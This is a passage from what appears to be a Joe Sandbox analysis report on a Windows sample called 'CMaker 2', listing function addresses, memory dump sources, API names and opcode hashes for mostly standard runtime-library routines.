                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                  • Opcode ID: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
                                                                                                                                                                                  • Instruction ID: 32f2e68cef169bb4771cd13c6f4a8025e42c60b6f2906e4823994db3b39f4d41
                                                                                                                                                                                  • Opcode Fuzzy Hash: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6231C432B082428AE7B69EA5946037D77ADEF4CB44F588435DE09A7E85CF3DE842C740
                                                                                                                                                                                  Function 00007FF6FABE6870 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                  • Opcode ID: 601036bb13c35aa651461849481dfd61c6a86d1eed7095f1acf94c7b8a200795
                                                                                                                                                                                  • Instruction ID: 04ab0b4fa61bd5dcff72f4a47117141f28c4c77c5aacc3cc9d37692d7580e5a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 601036bb13c35aa651461849481dfd61c6a86d1eed7095f1acf94c7b8a200795
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221BF25B0829245FB149B6268943BA9651BF4ABC4FCC50F0EE2C8B7C6EE7CE841C200
                                                                                                                                                                                  Function 00007FF6FABFB5B0 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction ID: c9e9998d5ed24129563c22849d9ffcb48eea977f65cdc66d5a01b76ebced5f7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60318126A286129AFB116F95CC4137C6A50AF42B94FC941B9D93D933D2EF7CE4418710
                                                                                                                                                                                  Function 00007FF6FABF9519 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                  • Opcode ID: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction ID: 317aa114d44f643121f157184ce81799ab20b9a7db8569d78d376a244af95e21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21923AE0474689EB249FA4C4402FC33A0FB49718F98467ADB2D87AC9EF38D544C780
                                                                                                                                                                                  Function 00007FF6FABF5DB4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction ID: 028fac1dce5106bc847249e952b8ff20d19388232c66c18b125eeeb49f4bc5cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511C32DA2E64281EF209F91D40067DA668BF87B80FCC4179EB6C97AC6EF3CD4108700
                                                                                                                                                                                  Function 00007FF6FAC0643C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction ID: 8bd48880803b86f2f387b8c157bbccada6e1ca8bf7faf4e197f78a48c96637f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA218172A18A4287DB61CF58E44037976B0EB84B94F589274EAADC76DAFF7DD4008B00
                                                                                                                                                                                  Function 00007FF6FABEE7B4 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction ID: d2e8a9e5d977c947a657a9c427837112b747ae5b647d703ec3207a73020cad26
                                                                                                                                                                                  • Opcode Fuzzy Hash: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801C865A1878241EB04DB529940079AA95BF86FE0F8C82B4DE7C97BD6EF7CE4018700
                                                                                                                                                                                  Function 00007FF6FABE73D0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7800: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FABE31D4,00000000,00007FF6FABE1905), ref: 00007FF6FABE7839
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00007FF6FABE4E66,?,00007FF6FABE224E), ref: 00007FF6FABE73F2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2592636585-0
                                                                                                                                                                                  • Opcode ID: af771f94276a2da18c982809e64c012f6bb03a559007e2af513c6c52247235dc
                                                                                                                                                                                  • Instruction ID: 01451ad13b7ed85c07e65821b1a050b7de93028f814fe1ec32cf0e7c507ad3d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: af771f94276a2da18c982809e64c012f6bb03a559007e2af513c6c52247235dc
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD0C201F2428141FB44E7A7BA4653951629FCABC0F9CD075EE2E83B86EC3CC0804B00
                                                                                                                                                                                  Function 00007FF6FABEB27C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6FABEB290
                                                                                                                                                                                    • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6FABEBCC0
                                                                                                                                                                                    • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6FABEBCC5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1208906642-0
                                                                                                                                                                                  • Opcode ID: e406b6a13abdc1de8099012e77fa9b1984323fd7cc8c2502f81400eb426856bf
                                                                                                                                                                                  • Instruction ID: d88ef5c0772c5416629be275dd50af88210be3c188cf798299d2cdc07582ba01
                                                                                                                                                                                  • Opcode Fuzzy Hash: e406b6a13abdc1de8099012e77fa9b1984323fd7cc8c2502f81400eb426856bf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E0E224D1D24381FFA92BA195C63BC0B801F63345FC098F9D87EE22C3BE0E74862621
                                                                                                                                                                                  Function 00007FFD935A1E01 Relevance: 1.3, APIs: 1, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                  • Opcode ID: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                                  • Instruction ID: d56e47cd191fccce4bfbd378f6e19c012b4122712a9ce0e0eb44e4b2bc34358d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65317032B0824286F7B6AEA5946037D629DEF4CB44F188435DE09A7E85CF39E882C740
                                                                                                                                                                                  Function 00007FF6FABFEB84 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF6FABFAEAA,?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012), ref: 00007FF6FABFEBD9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                  • Opcode ID: c8b9bc297ccf02c34bc4185cf4e45d41bb4c7179ccb82eebce59f868c6ce7279
                                                                                                                                                                                  • Instruction ID: 8eb983a54ec2f80432d26435a3a5141e26449c1f0029748d0438bcef924574f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b9bc297ccf02c34bc4185cf4e45d41bb4c7179ccb82eebce59f868c6ce7279
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F06D4CB0D20785FF685AE599813B952945FC6B80F8C50B9C92FC63C7FD2DE4808220
                                                                                                                                                                                  Function 00007FF6FABFD444 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                  • Opcode ID: 518377c8398ba572112478f17d195ad13ea908693e0d1cf717003d4179de8268
                                                                                                                                                                                  • Instruction ID: ab8cfafde7a397d9b1bbcd76148687cc9f4a81d96efdd2950c31e89f5d898a40
                                                                                                                                                                                  • Opcode Fuzzy Hash: 518377c8398ba572112478f17d195ad13ea908693e0d1cf717003d4179de8268
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F01C59B1D24785FF646BE2584137912915F867B4F8C97B8DD3EC62C2FE2CF4804260

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 00007FFD9F3B5750 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 356COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A4331
                                                                                                                                                                                  • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                  • API String ID: 148622186-4109427827
                                                                                                                                                                                  • Opcode ID: 01c2fd40f2c5ea4e9aeed28cc21b31da44747e28ed5f3481235f04e043f187b7
                                                                                                                                                                                  • Instruction ID: d616278b919148f0b8d50a96097eec70e5c636310d591ebbb8550bc173548aec
                                                                                                                                                                                  • Opcode Fuzzy Hash: 01c2fd40f2c5ea4e9aeed28cc21b31da44747e28ed5f3481235f04e043f187b7
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBF15422B0DA8285FAB5ABA5A87813977A1FF85B52F044439DD4E4EB98DF3CE514C700
                                                                                                                                                                                  Function 00007FFD9DFA3C00 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
